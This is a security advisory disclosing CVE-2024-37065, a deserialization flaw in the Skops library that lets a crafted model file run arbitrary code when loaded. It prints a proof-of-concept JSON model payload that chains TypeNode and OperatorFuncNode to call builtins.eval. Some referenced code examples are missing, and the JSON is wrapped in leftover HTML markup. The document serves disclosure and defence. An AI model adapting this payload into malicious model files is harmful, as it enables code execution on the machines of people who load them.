Skops
Vulnerability Report

Model Deserialization Leads to Code Execution

CVE Number

CVE-2024-37065

Summary

When loading nodes of type OperatorFuncNode Skops allows a model to call functions from within the operator module, specifying both the function and the arguments being passed to it. This system allows an attacker to craft a specialized payload in the form of a model that allows for arbitrary code execution to occur when a malicious model is loaded and compiled.

Products Impacted

This vulnerability is present in Skops v0.6 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

This vulnerability breaks down into 2 main components, the ability to load arbitrary functions into memory, and the ability to call a function in the operator module. The first can be done by creating a node of type TypeNode and pulling in any function you want, such as the builtin eval function:

<span class="token punctuation">{</span>
	<span class="token property">"__class__"</span><span class="token operator">:</span> <span class="token string">"eval"</span><span class="token punctuation">,</span>
	<span class="token property">"__module__"</span><span class="token operator">:</span> <span class="token string">"builtins"</span><span class="token punctuation">,</span>
	<span class="token property">"__loader__"</span><span class="token operator">:</span> <span class="token string">"TypeNode"</span><span class="token punctuation">,</span>
	<span class="token property">"__id__"</span><span class="token operator">:</span> <span class="token number">1</span>
<span class="token punctuation">}</span>
JSON

Because we can load functions into memory, if we are able to call them with the arguments that we want we can then exploit the loading system. This occurs in the compilation of a OperatorFuncNode node:

In Python 3.11 and later there is a function in the operator module called call which allows a user to call a function passed to it. This means that we need to create a model that grabs the call function and then passes in the eval function and the code we want to run:

<span class="token punctuation">{</span>
  <span class="token property">"__class__"</span><span class="token operator">:</span> <span class="token string">"call"</span><span class="token punctuation">,</span>
  <span class="token property">"__module__"</span><span class="token operator">:</span> <span class="token string">""</span><span class="token punctuation">,</span>
  <span class="token property">"__loader__"</span><span class="token operator">:</span> <span class="token string">"OperatorFuncNode"</span><span class="token punctuation">,</span>
  <span class="token property">"attrs"</span><span class="token operator">:</span> <span class="token punctuation">{</span>
    <span class="token property">"__class__"</span><span class="token operator">:</span> <span class="token string">"tuple"</span><span class="token punctuation">,</span>
    <span class="token property">"__module__"</span><span class="token operator">:</span> <span class="token string">"builtins"</span><span class="token punctuation">,</span>
    <span class="token property">"__loader__"</span><span class="token operator">:</span> <span class="token string">"TupleNode"</span><span class="token punctuation">,</span>
    <span class="token property">"content"</span><span class="token operator">:</span> <span class="token punctuation">[</span>
      <span class="token punctuation">{</span>
        <span class="token property">"__class__"</span><span class="token operator">:</span> <span class="token string">"eval"</span><span class="token punctuation">,</span>
        <span class="token property">"__module__"</span><span class="token operator">:</span> <span class="token string">"builtins"</span><span class="token punctuation">,</span>
        <span class="token property">"__loader__"</span><span class="token operator">:</span> <span class="token string">"TypeNode"</span><span class="token punctuation">,</span>
        <span class="token property">"__id__"</span><span class="token operator">:</span> <span class="token number">1</span>
      <span class="token punctuation">}</span><span class="token punctuation">,</span>
      <span class="token punctuation">{</span>
        <span class="token property">"__class__"</span><span class="token operator">:</span> <span class="token string">"str"</span><span class="token punctuation">,</span>
        <span class="token property">"__module__"</span><span class="token operator">:</span> <span class="token string">"builtins"</span><span class="token punctuation">,</span>
        <span class="token property">"__loader__"</span><span class="token operator">:</span> <span class="token string">"JsonNode"</span><span class="token punctuation">,</span>
        <span class="token property">"content"</span><span class="token operator">:</span> <span class="token string">""print('pwned by Abraxus from HiddenLayer')""</span><span class="token punctuation">,</span>
        <span class="token property">"__id__"</span><span class="token operator">:</span> <span class="token number">5</span><span class="token punctuation">,</span>
        <span class="token property">"is_json"</span><span class="token operator">:</span> <span class="token boolean">true</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">]</span><span class="token punctuation">,</span>
    <span class="token property">"__id__"</span><span class="token operator">:</span> <span class="token number">8</span>
  <span class="token punctuation">}</span><span class="token punctuation">,</span>
  <span class="token property">"__id__"</span><span class="token operator">:</span> <span class="token number">0</span><span class="token punctuation">,</span>
  <span class="token property">"protocol"</span><span class="token operator">:</span> <span class="token number">1</span><span class="token punctuation">,</span>
  <span class="token property">"_skops_version"</span><span class="token operator">:</span> <span class="token string">"0.10.dev0"</span>
<span class="token punctuation">}</span>
JSON

When loaded with the trusted parameter set to True or setting the trusted types to all unknown types, this then executes the code and returns None. In the tutorial for how to use the library (scikit-learn documentation) both examples would allow for code execution:

However, for the security minded individuals out there, since in multiple parts of the codebase load and loads are called with trusted set to True inside of another function, users can still be exploited. One example of this is the update command line tool:

Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer